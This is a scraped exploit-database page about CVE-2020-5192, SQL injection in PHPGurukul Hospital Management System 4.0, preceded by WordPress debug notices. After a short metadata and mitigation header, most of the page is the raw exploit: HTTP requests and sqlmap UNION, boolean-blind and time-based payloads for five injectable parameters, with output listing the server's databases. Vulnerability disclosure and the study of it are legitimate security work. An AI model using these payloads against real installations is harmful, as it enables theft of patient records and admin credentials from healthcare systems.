Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-import-export-lite domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the insert-headers-and-footers domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121
Hospital Management System 4.0 - 'searchdata' SQL Injection - exploit.company
header-logo
Suggest Exploit
vendor:
Hospital Management System
by:
FULLSHADE
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Hospital Management System
Affected Version From: 4
Affected Version To: 4
Patch Exists: NO
Related CWE: CVE-2020-5192
CPE: a:phpgurukul:hospital_management_system:4.0
Metasploit:
Other Scripts:
Tags: cve2020,hms,cms,sqli,authenticated,edb,cve
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Nuclei References: https://www.exploit-db.com/exploits/47840https://phpgurukul.com/hospital-management-system-in-php/https://nvd.nist.gov/vuln/detail/CVE-2020-5192
Nuclei Metadata: {'max-request': 2, 'verified': True, 'vendor': 'phpgurukul', 'product': 'hospital_management_system_in_php'}
Platforms Tested: Windows
2020

Hospital Management System 4.0 – ‘searchdata’ SQL Injection

The Hospital Management System 4.0 web application is vulnerable to SQL injection in multiple areas, specifically in the 'searchdata' parameter under the search feature in the doctor login.

Mitigation:

The vendor should sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Hospital Management System 4.0 - 'searchdata' SQL Injection
# Google Dork: N/A
# Date: 2020-01-02
# Exploit Author: FULLSHADE
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/hospital-management-system-in-php/
# Version: v4.0
# Tested on: Windows
# CVE : CVE-2020-5192

# The Hospital Management System 4.0 web application is vulnerable to
# SQL injection in multiple areas, listed below are 5 of the prominent
# and easy to exploit areas.

================================ 1 - SQLi ================================

POST /hospital/hospital/hms/doctor/search.php HTTP/1.1
Host: 10.0.0.214
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: https://10.0.0.214
DNT: 1
Connection: close
Referer: https://10.0.0.214/hospital/hospital/hms/doctor/search.php
Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5
Upgrade-Insecure-Requests: 1

searchdata=&search=

?searchdata parameter is vulnerable to SQL injection under the search feature in the doctor login.

POST parameter 'searchdata' is vulnerable.
sqlmap identified the following injection point(s) with a total of 120 HTTP(s) requests:
---
Parameter: searchdata (POST)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: searchdata=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvxbq','zIuFTDXhtLrbZmAXQXxIalrRpZgCjsPnduKboFfW'),'qpqjq'),NULL-- PqeG&search=
---
[15:49:58] [INFO] testing MySQL
[15:49:58] [INFO] confirming MySQL
[15:49:58] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.41, PHP 7.4.1
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[15:49:58] [INFO] fetching database names
available databases [6]:
[*] hms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test

================================ 2 - SQLi ================================

GET parameter 'viewid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 40 HTTP(s) requests:
---
Parameter: viewid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: viewid=6' AND 3413=3413 AND 'nBkv'='nBkv

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: viewid=6' AND SLEEP(5) AND 'PJim'='PJim

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: viewid=6' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767071,0x7957464b6f4a78624b536a75497051715a71587353746a4b6e45716441646345614f725449555748,0x717a717a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- XNyp

[15:54:21] [INFO] fetching database names
available databases [6]:
[*] hms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test

GET /hospital/hospital/hms/doctor/view-patient.php?viewid=6 HTTP/1.1
Host: 10.0.0.214
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

?viewid parameter is vulnerable to SQLi while viewing a patient under the doctor login

================================ 3 - SQLi ================================

Parameter: bs (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: bp=123&bs=123' AND SLEEP(5) AND 'CKbI'='CKbI&weight=123&temp=123&pres=123&submit=

?bs parameter is vulnerable to SQL injection on the doctors login when adding medical history to a patient

================================ 4 - SQLi ================================

POST /hospital/hospital/hms/doctor/add-patient.php HTTP/1.1
Host: 10.0.0.214
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.214/hospital/hospital/hms/doctor/add-patient.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
Origin: https://10.0.0.214
DNT: 1
Connection: close
Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5
Upgrade-Insecure-Requests: 1

patname=

patname parameter is vulnerable to SQLi under the add patient in the doctor login

================================ 5 - SQLi ================================

---
Parameter: cpass (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: cpass=123' AND 4808=4808#&npass=123&cfpass=123&submit=123

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: cpass=123' AND SLEEP(5)-- taxP&npass=123&cfpass=123&submit=123
---
available databases [6]:
[*] hms
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test

POST /hospital/hospital/hms/admin/change-password.php HTTP/1.1
Host: 10.0.0.214
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://10.0.0.214
DNT: 1
Connection: close
Referer: http://10.0.0.214/hospital/hospital/hms/admin/change-password.php
Cookie: PHPSESSID=g1mpom762nglpeptn51b4rg5h5
Upgrade-Insecure-Requests: 1

cpass=123&npass=123&cfpass=123&submit=123

the ?cpass parameter is vulnerable to blind SQL injection

Navigation

Suggest Exploit

Services By CQR

cqrsecured